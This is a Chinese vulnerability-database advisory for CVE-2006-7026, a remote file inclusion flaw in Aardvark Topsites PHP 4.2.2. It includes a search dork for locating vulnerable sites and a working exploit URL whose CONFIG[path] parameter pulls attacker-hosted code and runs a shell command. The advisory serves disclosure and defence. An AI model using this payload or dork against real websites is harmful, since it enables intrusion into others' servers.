Aardvark Topsites PHP中sources/join.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110175 漏洞类型 代码注入
发布时间 2006-04-30 更新时间 2007-02-22
CVE编号 CVE-2006-7026 CNNVD-ID CNNVD-200702-448
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/1730
https://www.securityfocus.com/bid/87047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-448
|漏洞详情
AardvarkTopsitesPHP4.2.2及之前版本的sources/join.php中存在PHP远程文件包含漏洞。当register_globals被启用时,远程攻击者可以通过CONFIG[path]参数中的URL,执行任意的PHP代码。
|漏洞EXP
Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-30]
|受影响的产品
Avatic Aardvark Topsites Php 4.2.2
|参考资料

来源:XF
名称:aardvark-lostpw-join-file-include(26189)
链接:http://xforce.iss.net/xforce/xfdb/26189
来源:MILW0RM
名称:1730
链接:http://www.milw0rm.com/exploits/1730